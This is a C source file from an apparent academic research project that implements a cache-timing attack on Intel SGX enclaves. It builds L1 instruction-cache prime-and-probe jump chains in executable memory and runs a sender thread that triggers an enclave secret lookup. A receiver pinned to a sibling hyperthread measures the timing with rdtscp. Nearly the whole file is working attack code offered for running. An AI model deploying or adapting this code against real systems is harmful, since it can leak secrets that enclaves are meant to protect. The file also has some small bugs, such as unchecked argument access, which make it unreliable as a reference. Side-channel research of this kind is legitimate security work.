/*
** SGX multi-threading (MT) eviction-based attack

** Usage: see README (step 4) in the top level 
** Authors: 
** Shuwen Deng (shuwen.deng@yale.edu)
** Bowen Huang (bowen.huang@yale.edu)
** Jakub Szefer (jakub.szefer@yale.edu)
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <immintrin.h>
#include <pthread.h>
#include <time.h>
#define gettid() syscall(SYS_gettid)
/* utility headers */
#include "debug.h"
#include "cacheutils.h"
#include <sgx_urts.h>
#include "Enclave/encl_u.h"

#define NUM_SAMPLES         1 
#define NUM_SLOTS           32 
#define SLOT_SIZE           128 
#define ARRAY_LEN           (NUM_SLOTS*SLOT_SIZE)
#define GET_SLOT(k)         (array[k*SLOT_SIZE])
char __attribute__((aligned(0x1000))) array[ARRAY_LEN];

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/mman.h>
#include <assert.h>
#include <strings.h>
#include <inttypes.h>
#include <x86intrin.h>

#define L1I_ASSOCIATIVITY 8
#define L1I_CACHELINE 32
#define L1I_SETS 32
#define PAGE_SIZE 4096

#define JMP_OFFSET ((L1I_CACHELINE) * (L1I_SETS) - 25) 
#define JMP_OPCODE 0xE9
#define RET_OPCODE 0xC3
#define SET(page, set) (((uint8_t *)l1i->memory) + L1I_CACHELINE * ((set) + (page) * (L1I_SETS))) 

typedef struct l1ipp *l1ipp_t;
l1ipp_t l1i_prepare();
void l1i_release(l1ipp_t l1i);
int l1i_monitor(l1ipp_t l1i, int line);
int l1i_unmonitor(l1ipp_t l1i, int line);
void l1i_monitorall(l1ipp_t l1i);
void l1i_unmonitorall(l1ipp_t l1i);
int l1i_getmonitoredset(l1ipp_t l1i, int *lines, int nlines);
void l1i_randomise(l1ipp_t l1);

void l1i_probe(l1ipp_t l1, uint16_t *results);

// Slot is currently not implemented
int l1i_repeatedprobe(l1ipp_t l1, int nrecords, uint64_t *results, int slot);

struct l1ipp{
  void *memory;
  uint8_t monitored[L1I_SETS];
  void *sets[L1I_SETS];
  int nsets;
};

static inline uint32_t rdtscp() {
  uint32_t rv;
  asm volatile ("rdtscp": "=a" (rv) :: "edx", "ecx");
  return rv;
}

static inline uint64_t rdtscp64() {
  uint32_t low, high;
  asm volatile ("rdtscp": "=a" (low), "=d" (high) :: "ecx");
  return (((uint64_t)high) << 32) | low;
}

void delayloop(uint32_t cycles) {
  uint64_t start = rdtscp64();
  while ((rdtscp64()-start) < cycles)
    ;
}

l1ipp_t l1i_prepare(void) {
  static uint8_t jmp[] = { JMP_OPCODE, 
    				JMP_OFFSET & 0xff, 
				(JMP_OFFSET >>8) & 0xff, 
    				(JMP_OFFSET >> 16) & 0xff, 
				(JMP_OFFSET >> 24) & 0xff};
  

  l1ipp_t l1i = (l1ipp_t)malloc(sizeof(struct l1ipp));
  l1i->memory = mmap(0, PAGE_SIZE * L1I_ASSOCIATIVITY*2, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0);
  for (int i = 0; i < L1I_SETS; i++) {
    for (int j = 0; j < L1I_ASSOCIATIVITY - 1; j++) {
      uint8_t *p = SET(j, i);
      *p++ = 0xB8;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xB9;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBB;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBA;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = JMP_OPCODE;
      *p++ = JMP_OFFSET & 0xff;
      *p++ = (JMP_OFFSET >>8) & 0xff;
      *p++ = (JMP_OFFSET >> 16) & 0xff;
      *p++ = (JMP_OFFSET >> 24) & 0xff;
    }
    *SET(L1I_ASSOCIATIVITY - 1, i) = RET_OPCODE;
    for (int j = L1I_ASSOCIATIVITY; j < L1I_ASSOCIATIVITY+3 - 1; j++) {
      uint8_t *p = SET(j, i);
      *p++ = 0xB8;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xB9;
      *p++ = 0x03;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBB;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0xBA;
      *p++ = 0x01;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = 0x00;
      *p++ = JMP_OPCODE;
      *p++ = JMP_OFFSET & 0xff;
      *p++ = (JMP_OFFSET >>8) & 0xff;
      *p++ = (JMP_OFFSET >> 16) & 0xff;
      *p++ = (JMP_OFFSET >> 24) & 0xff;

    }
    *SET(L1I_ASSOCIATIVITY+3 - 1, i) = RET_OPCODE;
  }
  l1i_monitorall(l1i);
  return l1i;
}

void l1i_release(l1ipp_t l1i) {
  munmap(l1i->memory, PAGE_SIZE * L1I_ASSOCIATIVITY);
  bzero(l1i, sizeof(struct l1ipp));
  free(l1i);
}

int l1i_monitor(l1ipp_t l1i, int line) {
  for (int i = 0;  i < l1i->nsets; i++) 
    if (l1i->monitored[i] == line) 
      return 0;
  l1i->monitored[l1i->nsets++] = line;
  return 1;
}

int l1i_unmonitor(l1ipp_t l1i, int line) {
  for (int i = 0;  i < l1i->nsets; i++) 
    if (l1i->monitored[i] == line) {
      l1i->monitored[i] = l1i->monitored[l1i->nsets--];
      return 1;
    }
  return 0;
}

void l1i_monitorall(l1ipp_t l1i) {
  for (int i = 0; i < L1I_SETS; i++)
    l1i->monitored[i] = i;
  l1i->nsets = L1I_SETS;
  l1i_randomise(l1i);
}

void l1i_unmonitorall(l1ipp_t l1i) {
  l1i->nsets = 0;
}


int l1i_getmonitoredset(l1ipp_t l1i, int *lines, int nlines) {
  if (lines != NULL) {
    if (nlines > l1i->nsets)
      nlines = l1i->nsets;
    for (int i = 0; i < nlines; i++)
      lines[i] = l1i->monitored[i];
  }
  return l1i->nsets;
}


int l1i_nsets(l1ipp_t l1i) {
  return l1i->nsets;
}

void l1i_randomise(l1ipp_t l1i) {
  char *mem = (char *)l1i->memory;
  for (int i = 0; i < l1i->nsets; i++) {
    // int p = random() % (l1i->nsets - i) + i;
    // uint8_t t = l1i->monitored[p];
    // l1i->monitored[p] = l1i->monitored[i];
    // l1i->monitored[i] = t;
  }
}
typedef void (*fptr)(void);




sgx_enclave_id_t create_enclave(void)
{
    sgx_launch_token_t token = {0};
    int updated = 0;
    sgx_enclave_id_t eid = -1;

    info_event("Creating enclave...");
    SGX_ASSERT( sgx_create_enclave( "./Enclave/encl.so", /*debug=*/1,
                                    &token, &updated, &eid, NULL ) );

    return eid;
}

int compare(const void * a, const void * b) {
    // insert nop1
   return ( *(uint64_t*)a - *(uint64_t*)b );
}

void usage(const char *prog) {
  fprintf(stderr, "Usage: %s <samples>\n", prog);
  exit(1);
}


int para_d=4;
char sender_mode='a';
int Tone=20000;
int Tzero=20000;
int assist_funct_set1(void);
int assist_funct_set2(void);
//receiver
void * test_delay(uint64_t samples,uint64_t loops) { 

  uint32_t res_low=0, res_high=0, res2_low=0, res2_high=0;
  FILE * fp;
  fp = fopen ("run_temp_v2.txt", "w");
  for (int loop_index = 0; loop_index < loops; loop_index++){
	// set 
	  asm volatile (
	      "mfence\n"
	      "lfence\n");
  	asm volatile ("rdtscp": "=a" (res_low), "=d" (res_high) :: "ecx");
  	for (uint64_t i = 0; i < samples; /* Increment inside */) {
		asm __volatile (
			".byte 0xe9 \n"
			".byte 0x7b \n" //addr1
			".byte 0x02 \n" //addr2 
			".byte 0x00 \n" //addr3
			".byte 0x00 \n" //addr4 
		);
    	i++;
  	}
    asm volatile (
          "mfence\n"
          "lfence\n");
    asm volatile ("rdtscp": "=a" (res2_low), "=d" (res2_high) :: "ecx");
    uint64_t final=0,final2=0;
    final=(((uint64_t)res_high) << 32) | res_low;
    final2=(((uint64_t)res2_high) << 32) | res2_low;
    fprintf(fp, "%llu\n", final2-final);
  }
	fclose(fp);
  // insert nop2
}

void * sender(sgx_enclave_id_t eid){ 
  
  SGX_ASSERT( ecall_secret_lookup(eid, array, ARRAY_LEN) ); 
}



int main( int argc, char **argv )
{
  sgx_enclave_id_t eid = create_enclave();
  int rv = 1, secret = 0;
  int i, j, med;
  int index=0;

  uint32_t res_low=0, res_high=0, res2_low=0, res2_high=0;
    
  /* Ensure array pages are mapped in */
  for (i=0; i < ARRAY_LEN; i++)
    array[i] = 0x00;

  int Is_sender=0;
  uint64_t samples;
  if(argc <2) { printf("wrong configure! must choose between sender or receiver\n"); return -1;}
  if (strcmp(argv[1], "sender") == 0){
      Is_sender=1;
      if(argc <3) { printf("wrong configure! must choose sender mode, opetions: \n 0 (send 0),\n 1 (send 1),\n a (send 010101...),\n r (send random bits after a prefix).\n"); return -1;}
      sender_mode=argv[2][0];    
  }
  else if (strcmp(argv[1], "receiver") == 0){
      Is_sender=0; 
      if(argc >= 3){
        samples=strtol(argv[2], NULL, 10);
        printf("samples=%d\n",samples);
      }  
      if(argc >= 4){
          para_d=strtol(argv[3], NULL, 10);
          printf("parameter d=%d\n",para_d);
      }
  } 
  else{ printf("wrong configure!\n"); return -1;}

  if (strcmp(argv[1], "sender") == 0){
    int message[128] = {0,0,0,0, 1,0,1,0, 1,1,1,1, 0,1,0,1};
    array[4]=1;array[6]=1;array[8]=1;array[9]=1;array[10]=1;array[11]=1;array[13]=1;array[15]=1;
    FILE * fp_sender = fopen ("message.txt", "a");
    if(sender_mode== '0'){
        for(int i =0; i< 128; i++){
              array[i] = 0; 
        }
    }
    else if(sender_mode== '1'){
        for(int i =0; i< 128; i++){
              array[i] = 1; 
        }
    }
    else if(sender_mode== 'r'){
          for(int i = 16;i < 128;i++){
          array[i] = rand()%2; 
        } 
    }else{ 
          for(int i =0; i< 128; i++){
              array[i] = i%2; 
          } 
    }
    printf("Message to be sent: ");
    for(int i = 0;i < 128;i++){
      printf("%d",array[i]);
    }
    printf("\n");
    fprintf(fp_sender, "Message to be sent: ");
    for(int i = 0;i < 128;i++){
      fprintf(fp_sender, "%d",array[i]);
    }
    fprintf(fp_sender, "\n");
    fclose(fp_sender);
  }


  cpu_set_t victim_set;
  CPU_ZERO(&victim_set); 
  cpu_set_t attacker_set;
  CPU_ZERO(&attacker_set);
    
  //For example, cpu 2 and 8 are sharing one core  
  CPU_SET(2,&victim_set);
  CPU_SET(8,&attacker_set);
  
  
  printf("Parameters set\n");
  uint64_t loops = atoi(argv[5]);


  /* ---------------------------------------------------------------------- */
    info_event("calling enclave...");
  
   
  if(Is_sender){
    if(sched_setaffinity(gettid(),sizeof(cpu_set_t),&victim_set)==-1){
        printf("Can not set affinity\n");
        return 1;
    } 
    sender(eid); 
  }
  else{
     if(sched_setaffinity(gettid(),sizeof(cpu_set_t),&attacker_set)==-1){
        printf("Can not set affinity\n");
        return 1;
    }
    test_delay(samples, loops); 
  }

  /* ---------------------------------------------------------------------- */
  info_event("destroying SGX enclave");
  SGX_ASSERT( sgx_destroy_enclave( eid ) );

  info("all is well; exiting..");
	return 0;
}




























